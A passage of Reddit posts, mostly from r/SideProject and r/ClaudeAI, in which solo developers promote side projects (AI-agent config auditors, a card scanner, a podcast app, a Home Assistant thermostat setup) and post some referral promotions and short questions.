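The marker mechanism is easy to picture: below is a hypothetical sketch of how an agent could pull comments back out with a plain file read (the `<!-- mdr: ... -->` syntax is my assumption, not md-redline's documented format):

```python
import re

# Hypothetical marker syntax: md-redline's real format may differ.
# HTML comments survive in the .md file but are invisible when rendered.
MARKER = re.compile(r"<!--\s*mdr:\s*(?P<comment>.*?)\s*-->", re.DOTALL)

def extract_comments(markdown_text: str) -> list[str]:
    """Return every inline review comment embedded in the markdown."""
    return [m.group("comment") for m in MARKER.finditer(markdown_text)]

doc = """# Spec
The API returns JSON. <!-- mdr: specify the error schema too -->
Auth uses API keys. <!-- mdr: what about key rotation? -->
"""
```

Because the markers are ordinary text, no special tooling is needed on the agent side.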

The workflow:

  1. AI generates a spec from your prompt
  2. Open with mdr /path/to/spec.md
  3. Review and leave inline comments
  4. Copy hand-off prompt, paste into your agent
  5. Agent updates the doc
  6. Review diffs

Runs locally. No account, no cloud. React + Hono + Vite. Open source, MIT license.

Feedback welcome!

https://github.com/dejuknow/md-redline

r/SideProject Rimuru207

Affordable AI for Developers and Creators

If you regularly use AI for coding, debugging, or automation, you already know how quickly costs can add up. Our platform is built to solve that problem by providing access to powerful AI models at a more affordable price.

What you get

• Access to large, advanced AI models at lower cost

• Free unlimited usage of smaller models

• Up to 2 million tokens per day

Rewards and Benefits

• $20 bonus when you sign up

• $20 referral bonus for both you and your friend

• $25 bonus when you join our Discord community

Why it matters

This platform is designed by a developer who understands the daily challenges of using AI tools. The goal is simple: make high-quality AI accessible without high costs, so you can focus on building, testing, and improving your work.

Start now

Explore the platform and take advantage of the available offers:

https://swiftrouter.com

For updates, support, and feedback, join our Discord community. Your input helps us improve and deliver a better experience.

r/SideProject go_to_failure

Get 85% OFF on Hera AI – Use This Hera AI Promo Code & Hera AI Invitation Code 2026

Want an 85% discount on Hera AI?

Use the latest Hera AI promo code and Hera AI invitation code 2026 and enjoy huge savings on your subscription.

⚠️ Important requirement:

To get the discount, you must create a new account using a new email address via our special link below.

💥 https://hera.cello.so/2UcFqlWTG22

✅ How to Get the 85% Discount

Use our referral/sign‑up link (add your link here).

Register a new Hera AI account using a new email address (not linked to any existing Hera AI account).

On the payment page, look for the “Enter Promo Code” or “Coupon Code” field.

Enter the Hera AI promo code (for example: HERA85OFF or the current valid code in 2026).

Confirm – the discount up to 85% will be applied automatically.

🎁 Hera AI Invitation Code Bonus If the platform supports invitation codes, you may also get extra benefits:

Look for “Have an invitation code?” when signing up.

Enter the Hera AI invitation code from our page.

Both you and the referrer can receive bonuses or extra credits (if the program is active).

r/SideProject knowledgeiskey20

Built a community-based crowdfunding concept & looking for honest feedback

Hey! I’m building a new type of crowdfunding platform focused on communities instead of one-off campaigns.

Would you mind taking 30 seconds to look at this and tell me:

  1. What do you think this product does after reading the page?
  2. Who do you think this is for?
  3. When would you actually use something like this?
  4. What feels confusing or unclear?

Link: https://www.publicfund.com/

r/SideProject Mr_BETADINE

I built a skill that makes LLMs stop making mistakes

this is my magnum opus.
i was so frustrated seeing my colleagues manually type "make no mistakes" when ending their cursor prompts.
so i had to take matters into my own hands.

it's so over for gstack, mstack is the meta!

r/SideProject MindmarketX

Your SaaS or App is dying in a folder… and you know it.

Be honest with yourself. You spent weeks or months building something you were really excited about. The idea is good. The code is almost there. But it’s stuck.

Maybe you’re weak at marketing.

Maybe the backend is breaking.

Maybe the design looks like shit.

Or maybe you just lost motivation and now it’s slowly dying in a forgotten folder.

Sound familiar?

That’s exactly why I created the community r/SaaSCoop. This is not another “idea” subreddit.

This is where half-finished SaaS projects come to **get finished**.

Drop your project there. Tell people exactly where you’re stuck.

Find a real partner — developer, marketer, designer, or co-founder.

Agree on equity or revenue share. No more watching your hard work rot alone.

If your project deserves to live, stop letting it die in silence. Drop it right now.

Use the correct flair and be clear about what you need + what you’re offering. Your project still has a chance.

Let’s give it a proper birth.

r/SideProject AkereOne

I built simple online calculator tools because I was tired of cluttered ones

Hey everyone,

I’ve been working on a small side project called CalcPocket — it’s a set of simple browser-based calculator tools.

The idea came from a pretty basic frustration. Most online calculators I used felt either cluttered, slow, or full of things I didn’t actually need. I just wanted something that loads instantly and lets me do quick calculations without distractions.

So I decided to build a lightweight version that focuses on speed and simplicity. No installs, no extra steps — just open and use.

It’s still early, and I’m trying to figure out what direction to take it next.

Would love your feedback:

- What kind of calculators or features would you expect?

- Anything you find annoying in existing tools?

- Would you actually use something like this?

Here it is:

https://www.calcpocket.com

Appreciate any thoughts 🙌

r/SideProject WreckingSeth

I built a Pokémon card scanner app for myself 3 months ago and it turned into a full collection tracker with a card scanner, price checker, portfolio tracker and binder organizer.

I'm a Pokémon card collector, and I was tired of tracking prices with apps I don't like or that are premium-locked. I was also tracking my binders in a spreadsheet to know where everything was.

I'm an engineer but had never touched mobile apps. I had some time, so I tried Flutter. It started as a simple scanner for myself (ML is my field, so I created an ML model that runs locally on the smartphone).

Then I added price tracking.

Then binder organization.

Then market trends.

Three months later it's a full app, so I said to myself: why not publish it on an app store?

And went for it while I'm still adding features.

What it does:

  • Scans cards with your camera
  • Tracks TCGPlayer + Cardmarket prices daily — covers both US and EU
  • Shows which of your cards gained/lost value this week
  • Price history charts per card
  • Virtual binder system to organize your collection the way you actually store them physically
  • 22,000+ cards supported across all sets

Free, no account needed, works offline after first sync.

Built with Flutter + TFLite for the on-device offline card recognition.

Play Store: https://play.google.com/store/apps/details?id=com.EBDev.pokescandex

Open to any feedback or question!

r/SideProject DisastrousPay6

I was missing out on many major hackathons for 3 years. So I finally did something about it and built my own "Radar" fr.

Alright yall, be honest.

How many of you found out about a hackathon from a LinkedIn post or a friend… just after registrations closed?

That was me for most of my 1st and 2nd year.

Not because I wasn’t trying. But because discovery genuinely felt broken.

Unstop exists. Devfolio exists. But the exposure felt limited. Same few events everywhere, or random ones with no real credibility.

And the worst part?

A lot of us can’t just travel 500–600km for a hackathon. But good remote hackathons with actual prize pools and PPO potential exist all the time; they’re just hard to find.

So I got a bit frustrated and built something for this.

A small project where I manually track and verify hackathons:

  • checking if they’re legit
  • looking at organizer history
  • tagging PPO potential

Right now it has ~60 curated events.

Not perfect; still improving, especially around city-wise data and automation.

Would genuinely like to know:

👉 How do you guys currently discover hackathons? 👉 Do you rely more on platforms, communities, or word of mouth?

If anyone’s curious, check out the link!

r/SideProject theberlindwall

Letterboxd for podcasts

Hello friends!

I want to share something that I have been working on for a long time. I have a problem which is that I am the kind of person who is constantly running out of podcasts to listen to. The only recommendations that work for me are word of mouth recommendations, so I built an app that does just that. Castaway is like Letterboxd or Beli for podcasts. You see an activity feed of what your friends are listening to, and you can listen to podcasts right there. You can review, rate and react to individual episodes. You can create sharable lists of podcasts. You can even create and share podcast clips. I designed this app to be the best podcast listening and discovery experience on the market, and put a lot of love and craft into every inch of it. I hope it sounds appealing to some of you. It's out now on the Apple app store!

Thanks!


r/SideProject Zealousideal-Try1401

Day 3 of building Poko in public.

Stats:

• Signups: 0 (still no signups)

• Videos exported: 0

• MRR: $0

One lesson: building a product is easy, but getting people to use it is hard. Even if it’s free.

Building https://poko.video — raw → polished video/screenshots in 5 min!

r/SideProject yasintoy

I built 6 apps recently — here’s what actually happened (no BS)

I’ve been on a building streak recently and shipped a few apps. All solo, all live, all early.

Trying to figure out what’s actually worth pushing vs killing.

Vinalize — browser game (endless runner + PvP)
https://www.vinalize.com/

Crossy Road × Minecraft-style runner with:

  • obstacles + diamonds
  • match-3 mini-game
  • real-time 1v1

Status:
Playable, but unclear if it’s actually fun long-term.
Not sure if this should become a mobile game or be killed.

Genau — location-based social app
https://apps.apple.com/us/app/genau-spot/id6756304047

Check in to a place → see who else is there → chat or meet

Idea: replace dating apps with real-life presence.
If you're in the same place, you already have shared context.

Status:
Biggest problem is obvious — no users → no value (cold start problem).
Trying to organize small real-world tests (15–20 people in one place).

Nara AI — AI lifestyle coach
https://apps.apple.com/us/app/nara-ai/id6751153104

AI chat that helps plan workouts, meals, habits, and daily routines.

Status:
Works as a product, but very crowded space.
Hard to differentiate vs other AI apps.

Boulder Survivor — mobile game
https://apps.apple.com/us/app/boulder-survivor/id6756771577

3D endless runner — dodge obstacles, survive, leaderboard.

Status:
Works, but basically no traction.
Feels more like a learning project than a real product.

Lane Runner 2 — mobile game
https://apps.apple.com/us/app/lane-runner-2/id6757285384

Another fast-paced runner with neon visuals.

Status:
Same as above — shipped, but no real distribution.

CrowdMind — CLI for validating product ideas
https://github.com/yasintoy/crowdmind

A CLI tool to sanity-check product ideas before wasting weeks building them.

What it does:

  • pulls complaints from Reddit / HN / GitHub
  • turns them into product ideas
  • tests them with simulated personas

Example:
crowdmind validate "AI-powered semantic search"
→ 54/100
→ "Most users just want faster Cmd+F"

Status:
Working, open source.
Useful for catching obvious bad ideas early, but not a replacement for real users.

What I’m learning

  • Building is easy. Distribution is everything.
  • Social apps are the hardest (need density, not features)
  • Games are hit-or-miss — without virality, they die
  • AI apps are crowded → differentiation matters more than execution
  • Validating ideas early is valuable, but AI ≠ real users

I’m trying to decide which one (if any) is worth going all-in on.

If you had to pick one to push, which would it be and why?

Also open to brutal feedback.

r/ClaudeAI Sad-Coast-8294

Claude for Open Source Program

Hey everyone,

I’m looking into the "Claude for Open Source" program and wanted to see if anyone here has successfully claimed the offer.

For those who got in:

  1. How long did the approval process take?

  2. Is there any catch, like hidden restrictions or something?

r/SideProject jabedbhuiyan

Draw 3D Animations on the Fly with Full Control (No Restrictions)

I’ve been working with Draw3D, and one thing I really like is how easy it makes controlled animation. You can create and adjust animations on the fly while still having full control over the scene.

It doesn’t lock you into rigid presets; you get flexibility without losing power. Feels like a good balance between control and simplicity.

Curious what others think about tools that prioritize both freedom and precision in 3D workflows.

r/SideProject ExcellentEngine8370

I lost 15k in a year because of one "smart" pricing decision (not promo)

Quick story.

A year ago I redesigned my pricing. My entry package felt too cheap so I added a few smaller packages above it at higher unit prices. The idea was to push people toward my best-selling package by making the small ones feel like a bad deal.

Sounded smart. I shipped it everywhere. No A/B test (worst decision lol). No calendar test. Just pushed it live.

11 months later I finally pulled the numbers and:

- Average order value didn't move at all

- Volume on that product got cut almost in half the exact month I shipped the change

- The new small packages ate into my best seller instead of pushing people toward it

Roughly 15k in lost revenue on that product alone.

Lessons I took from this:

  1. Write down your current numbers BEFORE you change anything. I had nothing to compare against for months.

  2. Cheap entry packages are acquisition, not a leak. People who buy $2 today come back for $20 later.

  3. If you can't A/B test, at least run a calendar test: compare two weeks before the change against two weeks after. Anything beats shipping blind.

  4. Check your data way more often than I did. I waited 11 months. Should have caught it in week 3.

Hope this saves someone a year.

PS: don't ask for the link in the comments, the moderators aren't exactly fans of my niche lol

r/SideProject NotGeorge1

Built a MicroSaaS in a week: A 1-on-1 tool for Managers (Next.js & Supabase).

I’m a dev by day, and I got so frustrated with how disorganized development 1-on-1s are that I decided to build a solution.

Most managers just keep a huge running document, or try to navigate from doc to doc to track progress, which makes it impossible to track action items or long-term career growth. I wanted to build a "MicroSaaS" that sits right between a blank text document and massive enterprise HR software.

Meet Accordia. I built it in about a week.

The Stack: Next.js, Zustand (for state), Tailwind, and Supabase.

To lower the barrier to entry, I built a fully functional "local" demo. Users can click around, create agendas, and test the UI without ever giving me an email address (state persists in local storage until they decide to join the waitlist).

Would love feedback from the sub on the landing page copy, the UI design, and whether the 'no sign-up' demo is a good hook for early conversion!

r/SideProject DanBuildsStuff

Looking for feedback

👋 Hey all!

Recently I've been building Ideyo & was hoping to get some feedback.

I built it because I felt like most of the time you end up building what works, copying popular problems, and quitting before you can even learn how to build something from start to finish. It's personally helped me to build something that I care about rather than another note-taking app.

Granted, it's not the best way to go for revenue, but at the speed at which building is now possible, having something personal to build could help scratch that builder's itch we get.

I've had a blast and a few headaches building it, and am now looking for some feedback. It's a bit of a work in progress, but it's my first full build.

thanks

Dan

Edit: it does look better on desktop than mobile, but installing it to your home screen can make it slightly easier to navigate on mobile.

r/SideProject soham512

How do you people sell your projects?

Hey,

Though I do not want to sell my SaaS, I still wanted to know how you people sell yours. What's the first step? Where do you go first? How do you start the conversation, and so on?

I have a micro SaaS with 100+ users and some are paying.

But I haven't had enough time to maintain it, though I will for sure. (Still, I should have a backup plan to sell it.)

Any reply will be appreciated 👍

r/SideProject PlateApprehensive103

Frustrated with AI data analysis tools so I built my own

I'm a statistician. I use AI tools for data analysis all the time: ChatGPT, Julius, etc.

The problem is they all do the same thing: English-to-pandas-to-chart with a paragraph of explanation. That's not analysis.

I wanted something that actually thinks the way I do: runs real statistical tests, shows the code so I can verify it, keeps my work in persistent pages I can revisit, and synthesizes findings across multiple analyses instead of forgetting everything after one prompt.

So I built PlotStudio AI. It's a desktop app that uses up to 6 AI agents working together. The output is a full analysis page with interactive charts, statistical tests, key findings, and implications. Not a chatbot response.

A few things that make it different from what's out there:

- Shows all generated code — no black box; you can audit every step and export your code
- Auto-generates questions about your data so you don't have to stare at a CSV wondering where to start, and generates more as you go
- Cross-experiment synthesis — run 5 analyses, then ask it to find patterns across all of them
- Export — PDF and code export
- Desktop-first — your data never touches our servers
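For a sense of what "real statistical tests" means beyond a chart with a paragraph, here is a minimal stdlib-only sketch of Welch's t statistic (illustrative only; not PlotStudio's actual code, and the sample data is invented):

```python
from math import sqrt
from statistics import mean, variance

def welch_t(a: list[float], b: list[float]) -> float:
    """Welch's t statistic for two independent samples with unequal variances."""
    return (mean(a) - mean(b)) / sqrt(variance(a) / len(a) + variance(b) / len(b))

# Invented sample data, e.g. a metric measured under two conditions.
group_a = [12.1, 11.8, 12.4, 12.0, 11.9]
group_b = [10.2, 10.5, 10.1, 10.4, 10.3]
t = welch_t(group_a, group_b)  # about 13.9 for this data
```

A real analysis page would pair the statistic with degrees of freedom and a p-value; the point is that the computation is auditable code, not prose.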

Would love feedback from anyone who works with data. What's missing from the tools you use today?

r/ClaudeAI Original-Shower-3346

I used Claude Code to build a CLI that audits AI coding agent setups — 2,431 checks across 8 platforms

I built Nerviq entirely with Claude Code over the past few weeks. Claude wrote ~95% of the code — the audit engine, harmony cross-platform detection, synergy routing, all 8 platform modules, and the test suite (91 tests). I directed the architecture and verified the output.

The project itself audits how well a repo is configured for AI coding agents. It started because I was running Claude Code, Cursor, and Copilot on the same repo and realized their configs were contradicting each other. Nobody was checking for that.

What it does:

- Scores your AI agent setup 0-100 across 8 platforms

- Checks 2,431 things: instructions files, hooks, deny rules, MCP config, verification loops

- Detects cross-platform config drift (harmony-audit)

- Auto-fixes what it can (nerviq fix)

npx @nerviq/cli audit

It's free and open source (AGPL-3.0). Zero dependencies, runs locally.

Most repos I tested score 10-20 out of 100. Common misses:

- No deny rules (agent can read .env files)

- No verification commands

- Multiple AI platforms with conflicting configs

- Hooks in files but not registered in settings

What Claude Code was great at: generating the 2,431 check functions from research docs, building the SVG chart dashboard, and writing platform-specific detection logic for 8 different config formats. What I had to manually fix: false positive rates on stack-specific checks and cross-platform capability matrices.

GitHub: https://github.com/nerviq/nerviq

Happy to answer questions about using Claude Code for building dev tools.

r/ClaudeAI whystrohm

I built a Digital Twin prompt and pushed it to GitHub. It scans your writing, maps how you think, builds a System Prompt of you, and generates a visual dashboard. Free.

Built this over the weekend. Pushed it to GitHub so anyone can run it.

It's a Digital Twin — a prompt that reverse-engineers how you think, talk, and make decisions, then packages it into a reusable System Prompt.

Here's what it actually produces:

  1. Scans your writing and runs quantitative analysis — word frequency, sentence structure, metaphor mapping, crutch phrase detection, topic clustering

  2. Maps four dimensions: linguistic fingerprint, cognitive pattern, decision logic, knowledge domains

  3. Builds a complete System Prompt — identity, tone rules, decision logic, interaction rules. Copy-paste ready. Load it into any AI and it operates as you.

  4. Stress-tests the prompt with a scenario designed to break character

  5. Generates a visual dashboard — word clouds, bar charts, topic radar, tone spectrum. Saved as an HTML file you open in your browser.

  6. Names the one pattern you didn't know you had

I ran it on 60 files of my own writing. 27,342 words. Some of what came back:

- Never once written maybe, perhaps, or I think. Zero softening language across 27K words. Had no idea.

- 309 architectural metaphors — pipelines, layers, stacks. Zero organic ones.

- I define everything by what it's NOT before saying what it is. Every document. Never noticed.

The stress test: gave it a 50K offer for manual labor that breaks every rule in the extracted decision logic. The Twin turned it down and counter-pitched a systems version. Which is what I would have done.

Three depth levels:

- Any LLM: paste the prompt + your writing. ~70%

- Claude with memory: just paste the prompt. ~85%

- Claude Code: scans your files, runs the full 7-step pipeline, generates the dashboard. 100%

Works on ChatGPT, Gemini, Claude, local models. The Claude Code version goes deeper with full quantitative analysis.

github.com/whystrohm/digital-twin-of-yourself

Free. MIT. Includes a universal prompt (works on any LLM), a full 7-step Claude Code pipeline, and a packaged Claude skill you can install in one command:

git clone https://github.com/whystrohm/digital-twin-of-yourself.git ~/.claude/skills/digital-twin

Safety first: only paste YOUR writing. Scrub names and client details before scanning. The prompt extracts principles, not data — no identifying information in the output.

Try it and let me know what you find. The patterns you don't know about are the interesting ones. Curious what surprises people.

r/SideProject oldtimeguitarguy

I built a hosting platform so MCP server developers can get paid for what they build

I've been working on mctx (mctx.ai) — a hosting platform for Apps for AI. The idea is simple: developers connect their GitHub repo containing an MCP server, set a monthly subscription price, and deploy. mctx handles hosting, auth, payments, and one-click publishing to the MCP ecosystem. Developers earn 80%, we keep 20% and handle the rest.

I built this because I believe MCP is going to change who gets to compete in the software market. When people interact with AI directly instead of through traditional UIs, a solo developer with a great MCP server can go head-to-head with enterprise tools. Why sign up for Notion AI when you can subscribe to a simple Notes app through Claude? That's the future I'm building for.

To make it easy to try, I made all of my own Apps free — Notes, Todos, Bible Study, Hidden Empire (a text adventure based on Zork), and a few others. When you sign up, you're automatically subscribed to a handful of them so you can see how it works immediately.

Tech stack: Cloudflare Workers, D1, Workers for Platforms, Auth0, Stripe Connect, Hono, Drizzle ORM. Happy to go deep on any of it.

Site: mctx.ai

r/ClaudeAI btangonan

Built an open-source macOS app that gives every Claude project its own /buddy companion

When /buddy launched on April 1st, I fell in love with it. It has room for improvement, though: it's one pet per account, its commentary comes from a small model with a 5,000-character window, and you can't easily transfer its feedback back into a Claude Code session.

Because of this, I built a macOS app called Anima.

Every project gets its own ASCII companion. Your token usage earns @nim@ (in-app currency) you spend on re-rolls. Your buddy polls all active sessions and surfaces observations about your work. 8 species, 5 rarity tiers, stat cards.

4MB. Tauri + Rust. Open source. MIT licensed.

https://github.com/btangonan/anima

First app I've ever shipped, would love feedback.

https://i.redd.it/jbd9guionltg1.gif

r/SideProject ahmedjaved6

Built a landing page for an idea on my birthday, a platform for broke builders who are almost there.

I'm a solo builder from Guwahati, Assam. I have ideas. I have skills. But I keep hitting a wall I cannot climb alone: no money to hire, no co-founder, projects sitting at 90% forever.

So I started building Broke Founders.

The idea: skilled builders find each other, declare scope and equity upfront, build with free tools, and split what the product earns. No salaries. No pitch decks. No equity negotiation theatre.

Time is the only currency.

Would love to know if this resonates with anyone, especially if you've got projects that are almost done and never shipped.

https://broke-founders.vercel.app

r/SideProject Zanoshky

Knit your memories

I've been building Knitty - a micro-journal where each subject (pet, person, trip, health, car) gets its own visual timeline. AI writes entries from your photos. Stack: NestJS + React + AWS Bedrock.

knitty.app - would love early feedback.

First 100 people will get PRO free access.

r/ClaudeAI lemon1825

I used Claude Code to build an open-source AI agent verification tool — gan-harness

I built gan-harness entirely with Claude Code (Opus). It's a verification layer that runs build, test, lint, typecheck, and secret scanning on AI agent output.

## What it does

When you run an AI agent (Claude Code, LangChain, etc.) to write code, gan-harness verifies the output before it ships:

npx gan-harness verify

It auto-detects your project type (Node/Python/Rust/Go) and runs 5 checks locally.
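Auto-detection like this typically boils down to marker files. A sketch of the idea (my guess at the approach, not gan-harness's actual code):

```python
# Illustrative marker-file detection: map well-known top-level files
# to an ecosystem name. First match wins.
MARKERS = [
    ("package.json", "node"),
    ("pyproject.toml", "python"),
    ("requirements.txt", "python"),
    ("Cargo.toml", "rust"),
    ("go.mod", "go"),
]

def detect_project_type(files: list[str]) -> str:
    """Map a repo's top-level file listing to an ecosystem name."""
    names = set(files)
    for marker, kind in MARKERS:
        if marker in names:
            return kind
    return "unknown"
```

The detected type then decides which build/test/lint commands the checks should run.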

## How Claude Code helped

- Claude Code wrote the initial TypeScript port from my bash scripts

- Security review was done by Claude's code-reviewer and security-reviewer agents

- Found and fixed 2 CRITICAL command injection vulnerabilities during the review

- All 42 tests were written with Claude Code's TDD workflow

## The problem it solves

AI agents fail in production in predictable ways: infinite loops, leaked secrets, hallucinated code passing self-evaluation, cost explosions. This tool catches those patterns with static checks before expensive API evaluation.

## Free to try

Fully open source, MIT license. No signup, no API key needed:

npx gan-harness init

npx gan-harness verify

GitHub: https://github.com/VIVEHACKER/gan-harness

Feedback welcome — especially on what checks you'd want added.

r/ClaudeAI Existing-Bicycle939

Can Claude Generate an Entire Web App from Detailed Requirements?

I’ve got a legacy web application built on outdated tech, and I’m planning a full rewrite using a modern stack with cleaner, well-structured code. As part of that, I’ll need to document the entire set of requirements, which will be fairly extensive.

I’ve experimented with Claude’s free version to generate small chunks of code (around 50–100 lines), and it worked surprisingly well. That got me thinking: if I provide very detailed requirements, is it realistic to generate an entire website using the paid version?

Time and cost aren’t major concerns here. I’m more interested in whether this approach is actually feasible and reliable compared to using a team of developers. Has anyone tried generating a full application this way?

r/SideProject Quzr27

Terminal tabs don’t scale, so I built a spatial workspace

Hey!

I've been running multiple Claude Code sessions at the same time and constantly losing track of which terminal is doing what.

So I built Korum — a spatial terminal workspace where each terminal lives on an infinite canvas. You can drag, resize, zoom, add notes next to terminals, and everything persists between sessions.

Built with Tauri 2 (~3.4 MB), macOS only for now.

Still very early — v0.1.0-alpha. Would love to hear if this is something you'd actually use.

GitHub: https://github.com/Quzr27/korum

r/SideProject sigitaszai

I thought I didn’t spend that much on food… I was wrong

Hey,

At the start of last month I decided to do something simple: just track everything I spend.

No budgeting, no trying to save money, nothing like that. I just wanted to see what my normal month actually looks like.

I managed to do it properly for about 15 days straight (I know I'm a bit lazy).

Pretty quickly one thing stood out… lunch at work.

It never felt expensive. Just grabbing something quick, €8–€12, nothing crazy.

But when I actually looked at it over a full month, it came out to around €350 just on lunch alone.

That was a bit of a reality check.

So the next month I didn’t do anything extreme, just started cooking lunch for the next day instead of buying it from the cafeteria.

Same routine, same work, just changed that one thing.

After another month, I checked again… and I had saved a bit over €200 without really feeling it.

That’s when it clicked for me - it’s not the big expenses, it’s the stuff you don’t notice. The annoying part is getting to that point. Tracking things consistently is way harder than it sounds. I’ve tried before and always dropped it after a few days.

That’s actually why I ended up building a budget tool for myself.

Main thing I changed was removing friction. I added a simple AI chat where I can just type something like “spent 10 on lunch” and it logs it. No forms, no effort.

That’s the first time I’ve been able to stick with tracking long enough to actually see patterns like this.

Now I’m turning it into an Android app because I want to use it daily without thinking about it.

I’m close to releasing it, but there’s one catch: Google Play requires at least 12 people to actively test the app for 14 days before I can publish it publicly.

So I’m looking for a small group of people who are up for trying it and giving honest feedback along the way.

If you want to try it just comment “Enroll me” and I’ll DM you with info.

If you actually use it and give feedback, I’ll give you lifetime Pro access.

Curious if anyone else had a similar “small expense adds up” moment.

r/ClaudeCode Gh0stReader

Update - This issue additionally affects login on other surfaces, such as Claude Code.
Apr 06, 2026 - 15:54 UTC

Update - We are continuing to work on a fix for this issue.
Apr 06, 2026 - 16:17 UTC

r/SideProject mlvps

Drop your startup URL, I'll set up a free lifetime NullMark link for you

I'm the founder of NullMark, a tool that fixes one specific conversion killer: around 40% of social media clicks open in in-app browsers (e.g. Instagram, TikTok, Facebook), which break checkout, kill cookie attribution, and lose you real sales (not even Apple Pay works in there).

So I built NullMark: a link redirect service that opens your link in the native browser instead of the broken in-app one.

One link swap. 5 seconds. No code.

Drop your product/startup below and I'll personally send you a free lifetime link (normally $30). The only ask: Give me some honest feedback. I launched on ProductHunt yesterday and got little to no traction.

(Yes this is self-promo, but I genuinely want to help! Limited spots.)

r/LocalLLaMA Extra-Designer9333

Dataset curation for LLM Research project that involves pre-training

Hello everyone,

I'm a junior researcher working without a supervisor on a novel RoPE enhancement architecture that involves pre-training from scratch. I'm now thinking about dataset curation. I have come up with a domain distribution covering web, wiki, code, and math pre-training data. My question is: should I have multiple datasets per domain, or is it better to use one big dataset per domain? For example, should I use FineWeb only for web, or split the web domain between FineWeb and, say, DCLM? My pre-training budget is going to be 50B tokens.
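Whichever way you split it, the mixing step usually comes down to per-domain sampling weights applied until the token budget is spent. A stdlib-only sketch (the weights here are illustrative assumptions, not a recommendation):

```python
import random

# Illustrative domain mixture for a fixed token budget; weights are assumptions.
MIXTURE = {"web": 0.60, "wiki": 0.10, "code": 0.20, "math": 0.10}

def sample_domain_schedule(total_tokens: int, avg_doc_tokens: int, seed: int = 0):
    """Sample documents domain-by-domain until the budget is consumed;
    return the per-domain token tally."""
    rng = random.Random(seed)
    domains, weights = zip(*MIXTURE.items())
    tally = {d: 0 for d in domains}
    consumed = 0
    while consumed < total_tokens:
        d = rng.choices(domains, weights=weights)[0]
        tally[d] += avg_doc_tokens
        consumed += avg_doc_tokens
    return tally
```

Splitting web between FineWeb and DCLM would just mean two sources feeding the same "web" bucket, with a second set of weights inside it.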

Thank you everyone in advance🙏

r/homeassistant CaptainRedsLab

As a heating professional I hate battery thermostats, so I went overboard and self-hosted a touchscreen communicating stat for my 1975 furnace

Red Seal Plumber and Gas Fitter here. Battery thermostats drive me nuts; I've seen dead batteries freeze water/sprinkler lines and flood entire units during Canadian winters. When I moved in and found one on my wall, along with a half-installed Nest, I knew they had to go.

Old thermostat set-up

Went with a Lennox iComfort E30 communicating thermostat. The display on the wall just handles communication, all the control wiring stays at the Smart Hub at the furnace. Only needed 4 wires to the wall instead of the usual 5-7 for a Nest or Ecobee.

New thermostat

Got it into Home Assistant through the Lennox HACS integration running locally. No cloud, no subscription. I'm planning on getting temperature and humidity sensors in the near future. Any bulletproof options people love that would pair nicely?

The furnace is from 1975 and still going. New one coming this summer and that's when the smart thermostat really opens up with staging and variable fan speed through HA.

Old ass furnace

Wiring diagram

Full disclosure: not affiliated with Lennox. Just a trades guy who does tech stuff on the side and got my hands on one of these thermostats for a good price.

Finished set-up

Anyone else self-hosting their HVAC controls? Curious what setups people are running. I put together a video documenting the process here: https://youtu.be/-U0xa6u9bgI

r/LocalLLaMA Loose-Masterpiece537

I built a context "SLICER" for LLMs and would like your opinion.

After many, many months of problems with AI:
- Loss of context
- Never remembering something specific in the chat

I decided to build what I call the "SLICER" ("FATIADOR"): it splits the full context into separate blocks.

The problem was:
When we send giant paragraphs with mixed questions, asking for several different things at once, the AI ends up getting lost along the way.

The solution I found:
Implement an architecture I call the "Double-Call Architecture."

The engine receives the complex text.
A smaller LLM does the job of "slicing" the input into separate contexts with independent logic.
Each context is processed individually, guaranteeing full isolation of each answer.

In the final payload we get a return inside `reconciled_blocks`, separated by a UUID for each block. This makes the blocks easier for the AI to understand and improves resolution: if there's a doubt about one specific question, it's easier for the AI to understand what is actually being discussed.

With the "SLICER", we can resolve a single question without disrupting the whole chat.

Example of the final payload:

```json
{
  "uuid": "{UUID_ÚNICO}",
  "session_id": "{SESSION_ID}",
  "timestamp": "{TIMESTAMP}",
  "trace_id": "{TRACE_ID}",
  "type": "result",
  "subtype": "success",
  "duration_ms": 0.0,
  "duration_api_ms": 0.0,
  "is_error": false,
  "num_turns": 1,
  "result": {
    "reconciled_blocks": [
      {
        "id": "{UUID_PERGUNTAS_1_2_3}",
        "intent_title": "{INTUITO DA PERGUNTA}",
        "semantic_tags": "{TAGS_DA_PERGUNTA}",
        "cerebro_memory_key": { "context_id": "{UUID_SALVO_MEMORIA}" },
        "resolution": "{RESPOSTAS}"
      }
    ]
  },
  "total_cost_usd": 0.0,
  "usage": {}
}
```

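The double-call flow the post describes could look like this minimal sketch. Both model calls are stubbed out (no real LLM involved), and the naive question-mark splitter just stands in for the smaller "slicer" model:

```python
import uuid

def slice_contexts(text: str) -> list[str]:
    """Stand-in for the small slicer LLM: naive split on question marks."""
    return [p.strip() + "?" for p in text.split("?") if p.strip()]

def answer(context: str) -> str:
    """Stand-in for the main LLM call answering one isolated context."""
    return f"answer to: {context}"

def reconcile(text: str) -> dict:
    """Slice the input, answer each block in isolation, return the payload."""
    blocks = [
        {
            "id": str(uuid.uuid4()),
            "intent_title": ctx,
            "resolution": answer(ctx),
        }
        for ctx in slice_contexts(text)
    ]
    return {"type": "result", "result": {"reconciled_blocks": blocks}}
```

The isolation guarantee comes from each `answer()` call seeing only its own block, never the full mixed paragraph.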
r/LocalLLaMA Longjumping_Fly_2978

With Qwen 3.6 Plus now surpassing 5T tokens on OpenRouter, I expect major leaps in coding performance for next Qwen models.

Really, I expect wild progress from Chinese AI.

r/SideProject Independent-Respect2

Too Many AI Tools, Too Much Noise. How Do You Actually Get Started?

Hey everyone,

I wanted to share a bit of my situation and hopefully get some guidance from people with more experience in this space.

I don’t come from a strong coding background. The only real experience I have is using RStudio for statistical and data analysis projects during university, and a few days ago I automated a small part of my job by scraping some info I needed. Recently though, I’ve gotten really interested in AI, especially building automations, SaaS, and small tools (agents, workflows, etc.), both for my job and for personal projects.

The problem is… I’ve been feeling pretty overwhelmed. Every time I go on X (Twitter), I see new tools, new frameworks, new “this is better than that,” and constant GitHub repos popping up. One day it’s one tool, the next day it’s something completely different that’s supposedly “way better.”

At this point, I feel a bit lost trying to figure out what actually matters and what I should focus on.

So my question is:

For someone in my position (beginner/intermediate, limited coding experience), what are the core tools or stack I should focus on to start building useful projects with AI?

How do you avoid getting overwhelmed by all the noise and constant new releases?

I’m not trying to chase every new shiny thing, I just want a solid foundation to start building real & practical projects.

Would really appreciate any advice.

Thank You!

r/ClaudeCode Beneficial_Carry_530

Is Claude down?

Getting a login error type bug that usually surfaces when it is down.

